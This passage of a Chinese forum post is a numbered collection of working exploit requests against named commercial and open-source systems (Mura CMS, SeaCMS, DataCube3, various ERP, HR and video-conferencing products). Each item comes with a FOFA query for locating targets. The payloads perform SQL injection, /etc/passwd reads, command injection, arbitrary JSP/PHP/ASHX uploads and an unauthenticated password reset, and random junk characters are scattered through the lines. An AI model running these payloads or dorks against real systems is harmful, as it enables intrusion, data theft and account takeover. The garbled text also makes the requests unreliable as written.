* S9 P6 T4 d7 cHost: your-ip' r. S! E6 \) y2 A; i. X# ^2 q8 B5 v
Accept-Encoding: gzip, deflate
* r# y$ B( \8 B) u9 Z- ~0 E" fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.02 m' t3 [0 a& y t' h. ]' h
Accept: application/xml, text/xml, */*; q=0.01" [' v1 H5 f* T/ L2 m
Content-Type: text/xml; charset=utf-8 l: \, n) h% p* k0 m( B! u7 V# V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 v- n- d2 y; |+ R. p
X-Requested-With: XMLHttpRequest( {9 F6 T) H; }, f6 M
. g! G" a( C) g0 d- Z
* W, [- I6 t1 S& W" Y* P9 l
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
* z0 s3 \) d# r
W9 p" m A/ ~/ ^6 A, O8 r" k: q. I2 K
185. 瑞友天翼应用虚拟化系统SQL注入/ }+ m/ `. n" v0 c6 `) @4 G
version < 7.0.5.1# |/ f7 |3 B+ e5 ]% D
FOFA:app="REALOR-天翼应用虚拟化系统"/ G3 M- ~- u" y. N
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
5 G( ^8 F; K- ]6 [" {4 cHost: host8 m1 E: E+ q, i+ J' u* t
6 Q0 C% E6 n: [6 w* S+ i% q. j# L! _1 Q) s2 }3 A# X# _% W+ |
186. F-logic DataCube3 SQL注入& N: I' Z# e7 t1 ?0 ?' _* {) t5 A
CVE-2024-31750
7 n6 j+ R6 W# f. E$ W) zF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统- s- ~# G" Z( n8 z* m; s7 B( D
FOFA:title=="DataCube3"
$ {/ e1 e2 e- W/ U1 tPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
! G8 H# V( R: D# T/ M6 jHost: your-ip3 p* l3 P& o' m0 t9 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
* f5 s# Z8 `9 x: a' SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8( H& u( U# Q- ~9 k+ }0 h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& g+ G# a O' e0 |3 Q
Accept-Encoding: gzip, deflate- V& o+ F7 J+ ^. R$ j( b
Connection: close
3 ]5 _3 @2 Y" {* i) A5 f Y* DContent-Type: application/x-www-form-urlencoded
9 @3 o7 |3 L! F% F& o+ n6 Q' H, v5 [7 _- D
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
7 u) y9 S1 F2 I3 j% F7 S, q5 e" r1 K8 R8 m, N
5 A" @; U9 u x" ~187. Mura CMS processAsyncObject SQL注入' z3 q6 Q- z% J3 Z! |% [& W A9 t
CVE-2024-32640
2 L1 ^9 E. _! p* ^) p3 TFOFA:"Mura CMS"
$ ^! F4 h2 d' XPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
1 G; d- |4 m! j+ m* r6 s7 aHost: your-ip8 R! J! }7 _# Z2 Z
Content-Type: application/x-www-form-urlencoded% L0 m, u$ w f" `
1 `- [3 S& M. f* @$ A; }. w" d: X3 }; a/ A
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
: {! G! \/ [) ?; U1 w3 {
& @( x, L/ j4 p# U7 g5 G- G
0 h+ x0 {+ b- `3 r( t$ v0 g188. 叁体-佳会视频会议 attachment 任意文件读取
9 r9 R+ E) K8 C" [6 ~version <= 3.9.7
8 r! n$ j4 R* h# TFOFA:body="/system/get_rtc_user_defined_info?site_id"
. A% ~8 ~! @# R6 b! nGET /attachment?file=/etc/passwd HTTP/1.13 V$ x2 z, }) V _7 m/ F+ K
Host: your-ip$ I# t1 b6 f% ~0 d9 m) N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ `9 `/ d9 ~1 |+ O3 v% @. r3 E- o0 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ P2 u* l( T6 ]/ p, N: MAccept-Encoding: gzip, deflate
8 W0 j& J# y& |8 D" PAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
9 Y. b7 m1 ?" a* p' w7 o+ p( c" L5 AConnection: close
9 G; Y* @& B, Z, a5 _ P& i& {6 ]. K4 [
( }9 v4 T" a( L. G, W1 Y189. 蓝网科技临床浏览系统 deleteStudy SQL注入
* u3 ]& a' g2 I/ ]# E1 ZFOFA:app="LANWON-临床浏览系统"# i% w, p8 b9 m R. G
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1: a t: X$ H; `% h+ T3 u
Host: your-ip9 n* P, I4 K( m; R( o; [! Y6 s8 n
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 `. E& g* w* l- _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. B8 l$ B. _3 {
Accept-Encoding: gzip, deflate, S9 _: D M6 }5 `3 O
Accept-Language: zh-CN,zh;q=0.9
. u7 V) T6 c9 W$ k. k# _5 [1 U" UConnection: close7 @0 g+ L" h+ d9 ~
+ r/ N5 C# b, G% \4 |; O- t6 p
' r0 I0 o! Z8 V9 C* o6 C8 a
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
, ]% X9 u4 X; pFOFA:title=="短视频矩阵营销系统"
$ Q5 v k. a! c7 A& D/ vPOST /index.php/admin/Userinfo/poihuoqu HTTP/2- O% \* P* k4 J' K
Host: your-ip
+ l) R# j2 k4 ~) P5 P7 w4 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
' j- N. t9 H5 w6 ?; j+ AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
6 l* ?" J# {( Z: vContent-Type: application/x-www-form-urlencoded' U/ ]2 ?1 E/ P& q+ u8 J
Accept-Encoding: gzip, deflate
. L, x* ?' { eAccept-Language: zh-CN,zh;q=0.9
; ~1 V% K0 c2 h+ D6 N G. a( _! _0 u* m0 \1 O- r$ _4 m3 v) b
poi=file:///etc/passwd
$ a' X- V* u% B3 G1 @7 C2 w! P3 z# ]- V2 w3 g- `" r0 M
) r& m8 r+ J- W* V" B5 `191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入# }2 n0 |% i* F* B; g$ u: O
FOFA:body="/CDGServer3/index.jsp"" r5 `2 q8 V8 p! u2 V: |
POST /CDGServer3/js/../NavigationAjax HTTP/1.1& U0 H( P% Q% Z% L5 @6 y* p
Host: your-ip& P3 Q9 S, e# w! S- g. ?3 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& x1 c6 [" b& d4 C: w% R' i+ kContent-Type: application/x-www-form-urlencoded. \4 ~9 v8 N2 {, I, E
1 [5 r( S& ]$ hcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
5 ]) o! v3 Z' o. M3 q9 T5 z& f" Q
/ F- Q6 D K: b1 V# x192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
( N4 Z) s7 T+ nFOFA:title="用户登录_富通天下外贸ERP"
$ S B7 D; u% U7 H* H+ b+ vPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1; [5 ]0 V. a3 h6 F- F3 ~$ @8 u; S
Host: your-ip
" @: v$ x6 C# o' n) R8 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36, J" `1 H. b0 B! c1 o+ G9 b
Content-Type: application/x-www-form-urlencoded9 z" Z" i+ H: e5 q4 G- c
& w$ z- g7 p5 P- F. ~1 M1 j; X: ~5 h$ r7 ^7 j5 O5 h" u/ H+ Q
<% @ webhandler language="C#" class="AverageHandler" %>5 p1 B8 x) Q1 t% l* u
using System;
) `2 F( M, t. Q4 Z% V5 dusing System.Web;- z5 w1 {7 f2 T; O' T
public class AverageHandler : IHttpHandler( G/ V- s( r* L5 L
{7 p H! e* @3 i; n0 U
public bool IsReusable* @9 n7 h* o0 Z ^% ^& u; m' R
{ get { return true; } }
6 \# Q" R' C+ Y& ]. ]2 ypublic void ProcessRequest(HttpContext ctx)% _% {' l* k+ m3 n, t
{% ~1 n' n& B- c4 P
ctx.Response.Write("test");* e ?. V% ?& B1 B4 D, Y
}" B- p$ \( N" m4 ^8 o5 j
}. F; F7 _7 a1 v& n
; Q9 `0 p: ~% S% T/ s/ l: |
) c3 h! p3 L2 u' ~/ P, y
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
/ x1 N4 l( E% ?FOFA:body="山石云鉴主机安全管理系统"
2 W( Q! F9 b; y# N \GET /master/ajaxActions/getTokenAction.php HTTP/1.1
0 `5 ~9 V7 X' W2 p7 a+ G( [1 AHost:. U& F% I2 ?. m, c* a
Cookie: PHPSESSID=2333333333333;/ K& ?$ r* Y4 ?+ v2 _& f7 Z* n
Content-Type: application/x-www-form-urlencoded
! u( \0 v) \9 k/ _* R3 K& BUser-Agent: Mozilla/5.0
* N) v Y& ~/ ^8 ]! q& N/ N& M( K" X# s' u) G$ z R, ]+ o6 n
: G1 e9 |7 r o* w) Y: yPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
- P6 z3 F0 r1 D2 kHost:0 ~9 n- w* y4 k" x. A
User-Agent: Mozilla/5.0
+ t0 K7 \% K* B- WAccept-Encoding: gzip, deflate* P6 @' s6 C# F% S
Accept: */*5 i) [+ z# k# [" R! k: L
Connection: close% D6 _% A. q% c5 r
Cookie: PHPSESSID=2333333333333;+ k: G+ c- a" ]% z% I
Content-Type: application/x-www-form-urlencoded/ d; x7 } f6 t, G) w) r) ]
Content-Length: 84
. Q* l I2 K" x. N. m
* b( ]' F3 W0 }param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')7 P7 D" _: x8 G- q( u4 p
. ?& r" W! l' c
+ T9 t2 S3 Q- p* hGET /master/img/config HTTP/1.1
% d9 W3 u9 i; {, {( sHost:5 }/ C) J5 V; q2 K1 E8 J8 Z4 x
User-Agent: Mozilla/5.0" N9 ?0 ]& N# r5 T
9 A7 n9 ]. E- N6 x
& s6 K9 F% i! A6 A194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
: ^, Q3 y0 L- y9 I1 h; P! J% MFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
9 R/ ]6 g2 [9 N* g E$ D4 {% H# V8 f A. |& ^/ {& p. P F2 x5 g& g
POST /servlet/uploadAttachmentServlet HTTP/1.1
# L6 `+ c6 r; A( X1 qHost: host3 f* \: a+ x7 X+ O) I) h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
2 ]' j% l6 z) o! k6 e: ?6 I! hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( N B# j3 ~" x, g' `( |# | U |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 ?( D1 ?% x4 S# T
Accept-Encoding: gzip, deflate
, e4 Y- E- P4 h4 f5 H) XConnection: close
^- }0 L: \1 l, @& G! o- a3 sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 u; g9 y; k2 n) O1 e6 P* b------WebKitFormBoundaryKNt0t4vBe8cX9rZk
& l0 N5 D! f8 p1 a
$ R4 H* _4 S' V& L4 WContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"4 y& p$ `- g5 f! N
Content-Type: text/plain
+ F; [5 C: q5 m. j `: N. ]1 ?<% out.println("hello");%>% N2 N2 H8 q6 j( v/ ^
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- E. G! _% S4 I. w2 g7 S# KContent-Disposition: form-data; name="json"# C# R; w3 ?" q6 o5 N
{"iq":{"query":{"UpdateType":"mail"}}}$ L4 g/ [ m3 V
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
/ D# q, n& z1 K# ^- f7 v
9 F( k1 C. a3 f7 y; ^- ~' e1 C
7 |7 A% ?+ _1 ~$ }" e# {' F+ F195. 飞鱼星上网行为管理系统 send_order.cgi命令执行8 z8 }$ C* M3 R, V& e0 z
FOFA:title=="飞鱼星企业级智能上网行为管理系统
) u7 E7 B! ~8 zPOST /send_order.cgi?parameter=operation HTTP/1.1
5 Q; \3 A( K. q0 n! z2 kHost: 127.0.0.1
+ r6 e" E2 C8 H8 [' O8 X M* hPragma: no-cache) G. o! e5 }# |' W
Cache-Control: no-cache) p/ M2 i- j1 b' l& g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
3 e( ?7 A/ b9 QAccept: */*' N# I y0 z+ W- x; K
Accept-Encoding: gzip, deflate7 k& X; O1 W6 Q6 Z; V, u* H
Accept-Language: zh-CN,zh;q=0.9
. H& i J. }: n- TConnection: close
! s/ ^3 e8 y8 m4 S+ iContent-Type: application/x-www-form-urlencoded
& Y, E/ @8 A' _4 v) |Content-Length: 68, V: P0 n: Z; K, W
+ N/ `% r. @( Q5 M. ^0 w( y) z
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
% U6 k# B9 V$ v: i- }
7 F* u! k! \; y+ I
# O$ |. B- Y: X+ a% @: u196. 河南省风速科技统一认证平台密码重置7 e* m! H+ D. Z. J
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
2 M1 l+ w' I) Z- o5 x+ h* mPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
0 A, d+ [8 o2 |7 }* kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) S+ ?0 w/ s( ^- ?Content-Type: application/json;charset=UTF-8+ ^4 S9 J% c* d( S+ U
X-Requested-With: XMLHttpRequest9 G# O4 K* r- _0 c$ F
Host:8 G X6 F0 C' H. x; \
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
, {3 i9 z$ R' n9 }Content-Length: 456 F/ Z& R0 q8 X
Connection: close2 s8 M; F; Q; m7 K8 M. A. Z
J3 V' }1 f9 |5 O& f. I& c{"xgh":"test","newPass":"test666","email":""}% m. C/ ]' H6 g E, ]0 E* F' S
( a4 n }* B% a, f F9 ?; x4 R
0 F$ [* s% Y# G0 W& l2 F
. B# f) D+ v; E: i( N197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入$ g7 y" l5 l2 [" g
FOFA:app="浙大恩特客户资源管理系统"
/ ~% l& P+ |7 eGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1- c2 p# P5 E D( u( N+ @
Host:& s1 t6 {" ]- d4 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36# ~! u, Y2 D& M4 q- w
Accept-Encoding: gzip, deflate
: S7 Q& W( E) F$ X- U3 \ t/ G' P2 C0 EConnection: close# L0 b5 ?- C( \- Q
& ?- W# J& H) N! j& n% g
# E' L3 |$ m8 Z' X( ?! o- } D' c. W
198. 阿里云盘 WebDAV 命令注入
2 L, ]9 \+ d( J1 b1 u0 fCVE-2024-29640( ? @; a/ y9 v( I
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
: v* R2 `) Y9 D9 t7 YCookie: sysauth=41273cb2cffef0bb5d0653592624cf644 E9 M2 y z# p
Accept: */*
9 y# T( N" d4 \6 _- t9 @Accept-Encoding: gzip, deflate
: r B3 K& j" c) ZAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
1 b0 i, k1 X1 v2 Z( A+ _Connection: close
8 g5 H, u1 E; s1 I7 C# N
+ B. `7 ]. ?& [7 Y. X. D6 C8 y
v( h+ h* i2 O6 A D. i199. cockpit系统assetsmanager_upload接口 文件上传
# h J5 A2 ` w2 M8 q. s
( Y( d$ Q( S+ `$ Y8 U$ o) O( s+ v1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
8 J5 G) n0 ]& l- \, G/ p# PGET /auth/login?to=/ HTTP/1.1
# a8 }8 q @4 B% Z
! o4 `8 n2 e1 _响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw". A. ?0 b$ s, h+ {5 ^
6 K$ D( [ s/ s4 ?
2.使用刚才上一步获取到的jwt获取cookie:% _3 Z* d* ?4 o. O; V
Q0 I, B( y1 ]! B. I8 y
POST /auth/check HTTP/1.1
1 v* w6 T; ^- Q* R( ^/ uContent-Type: application/json) k9 M* \% x+ L4 I7 y% N
5 f4 Z/ u# o5 M( t1 n
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}! c4 {' R( D- K) J w& k
) b$ i9 q; @9 a& h5 ]7 q响应:200,返回值:
) s. Q- `- b& _/ _; lSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/- n* ?( b( \* ?0 E
Fofa:title="Authenticate Please!"
* b3 B& p* `* Y1 U' TPOST /assetsmanager/upload HTTP/1.1
5 X9 `. R h% {% j( r) dContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3' P9 r. |" t; J: O
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
: |, c( T, {" h# z8 @1 a; E3 t( ~
: O! q0 N) X2 u# E+ Q5 q) ~-----------------------------36D28FBc36bd6feE7Fb3+ D* g1 m w( z0 G: y4 |
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
% X+ n) T1 J6 M: _8 kContent-Type: text/php
- U' ?0 F/ e) c, _ d
. O# A( n3 _8 @<?php echo "tttt";unlink(__FILE__);?>( D. ]9 S7 M" y0 p' s1 k2 c
-----------------------------36D28FBc36bd6feE7Fb3
8 P6 T1 X1 J( u- h- U/ E' k9 ^Content-Disposition: form-data; name="folder"! ?) }: b T; d% z' f, q. _
; M6 h4 F" C$ d; R( k& n2 C
-----------------------------36D28FBc36bd6feE7Fb3--
c: d9 @' i0 r! V* v( M/ }; x1 _/ \+ {; N: E6 y" M
* q7 H/ i6 t: h6 A, s6 F/storage/uploads/tttt.php
) _' l% n( E- C5 g- K
; Y6 N" @9 p3 Z200. SeaCMS海洋影视管理系统dmku SQL注入0 t9 }6 ]+ v/ c# F% o; ]
FOFA:app="海洋CMS"& ~) D# v9 X7 o! a# x% X: y
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.15 V! K. X% B9 [2 M3 I" Y
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s+ P; m m4 ~% f1 b4 k5 @" h
Upgrade-Insecure-Requests: 1. G7 A8 k0 C2 V2 ~6 Y
Cache-Control: max-age=0
4 x) H: b3 M7 P4 C6 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 c. c1 l- W! y- z3 e
Accept-Encoding: gzip, deflate
8 e) V. g/ v( S5 D1 @: sAccept-Language: zh-CN,zh;q=0.99 w# L2 X6 T8 k4 T; e, s
6 {7 ^8 U( u3 S2 b- e$ E" h0 K
% r6 ]6 T" H" i: O/ }201. 方正全媒体新闻采编系统 binary SQL注入- T) o" s( y' r
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
. R/ z P B# _& W: m8 rPOST /newsedit/newsplan/task/binary.do HTTP/1.1
/ S- X6 w# v& H4 T1 b2 VContent-Type: application/x-www-form-urlencoded
; z- N% W( P& j8 j* XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 M8 d# Q n% @Accept-Encoding: gzip, deflate" o) {3 X2 P2 H v
Accept-Language: zh-CN,zh;q=0.9
9 ~+ C8 D4 v( E% L/ MConnection: close/ R8 H; s" Y& E% V5 Y- d
" J$ D1 ?4 `8 e
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
. Y% `( ^; R/ v9 {. `5 ~1 t9 ?8 L8 c0 P$ g7 q& N X. I6 P5 U1 ~
. F* O! h+ t' c! B202. 微擎系统 AccountEdit任意文件上传( {' l2 s6 I) k% P' a- |& E
FOFA:body="/Widgets/WidgetCollection/"! c" ^& y2 _$ m3 E( i. Z
获取__VIEWSTATE和__EVENTVALIDATION值) n6 Z, J0 _! z, Q
GET /User/AccountEdit.aspx HTTP/1.1& U; k" {! n3 L8 T( c% d$ Z- Z
Host: 滑板人之家
' C+ Y8 T7 n% s! |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.319 h9 A$ `7 V5 y1 w
Content-Length: 0% C6 E8 W- F# s2 P; M$ T* h3 c ?
9 V: {, d7 t+ e$ G, P5 p5 h% x0 h) q0 e; _% E4 s. ^
替换__VIEWSTATE和__EVENTVALIDATION值) m' F( z# r+ h. P; b y- I" r' E
POST /User/AccountEdit.aspx HTTP/1.1
5 B- |* a1 b) P0 X8 R' H7 eAccept-Encoding: gzip, deflate, br
* Y3 |' n3 K" _& NContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687* D1 d4 `( T6 w1 z+ y* n7 p
( c" V o2 b& }) F: c: R( l6 e! |
-----------------------------786435874t38587593865736587346567358735687
+ V9 ~* Z" h4 L8 T) s( }0 T' qContent-Disposition: form-data; name="__VIEWSTATE"2 m" l+ m5 ? f3 s6 p$ E" t( d
, G: y! s4 \& R6 L: f" G- s1 J# b__VIEWSTATE
) @3 U/ \: O m2 ~8 } `) Q-----------------------------786435874t38587593865736587346567358735687: R: o& ^" U- Q* ^: Y
Content-Disposition: form-data; name="__EVENTVALIDATION"
. W6 }9 ?! C8 M; c$ d
2 Z- F$ O0 M' f& c__EVENTVALIDATION8 ^8 d; w: s' O/ `' d. B
-----------------------------786435874t385875938657365873465673587356878 R+ C7 F- X1 n
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"& T" S3 D( j+ r
Content-Type: text/plain; x8 A) V& R5 z' V+ b) o+ D( v
# Q' {( x/ _/ P" F3 I( A' i# A( JHello World!6 J0 t# \9 Q! E1 A" v: K- W# H, D/ b
-----------------------------786435874t385875938657365873465673587356876 M/ a% t" X$ o/ U5 L a5 e
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"- p- N+ }, j/ G6 M+ M7 t
; z- M4 R9 m$ S上传图片8 l# r7 S& _' Y1 Y3 \3 @5 c
-----------------------------786435874t38587593865736587346567358735687 p' c8 ]) l+ f
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
& G; W7 T2 ]) H& s' Q9 L b+ x/ m) A* C
3 t% ~8 X+ {+ \7 Y
-----------------------------786435874t38587593865736587346567358735687
/ i, p7 t# U0 \1 q- M0 s, qContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
& a7 p: a6 q f- O! F& y4 i8 |: S7 v# I
" N4 R3 Z& V0 T3 H9 H e-----------------------------786435874t38587593865736587346567358735687--4 ~2 x, `, @( p. V6 ?9 `; |
- f( i* E9 @8 _% e
" b t3 ?6 j3 |% K( d+ D4 V
/_data/Uploads/1123.txt
# J/ S; s' [! h2 N4 w$ F1 U0 H
4 n1 l0 I) u0 S203. 红海云EHR PtFjk 文件上传- P8 n$ j, m3 J& X6 Z4 T5 S
FOFA:body="RedseaPlatform"% M' b9 w0 g1 \" T7 M$ X6 M D
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.10 e, B5 F1 T; G0 T
Host: x.x.x.x
. k1 `7 {' k( \: X6 U7 X' V# AAccept-Encoding: gzip
8 l( X& b' C% u% V9 Y% y' |9 u; }6 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 G4 i9 B8 k( JContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4* p @6 j; w2 `4 a
Content-Length: 210
7 D6 } o3 L. e: D1 \
% N4 c c3 Y7 `) i$ L( Z8 L------WebKitFormBoundaryt7WbDl1tXogoZys4
8 g) C" o7 F( Y8 _7 bContent-Disposition: form-data; name="fj_file"; filename="11.jsp". e7 ~7 l8 f: ?, Q/ x; K+ l
Content-Type:image/jpeg+ V: K' R/ F, k+ I' u0 W7 W
3 x& z& j! _" w5 @2 @+ J) Z
<% out.print("hello,eHR");%>
k# h& b" X4 S5 b5 r) _4 |8 F% z6 D------WebKitFormBoundaryt7WbDl1tXogoZys4--
% w5 m) y8 {3 a8 o; S( W' S- F6 C0 _! `8 ?9 K% j9 j
2 n8 b' y$ A$ p1 U
) ~- }6 {* G& v& Y) i
& F" w) e# }9 d9 r% H$ G( r! Z1 T! ], V0 \- B
* H7 V4 H y, A9 l# [5 J
|
发表于 2024-6-5 14:31:29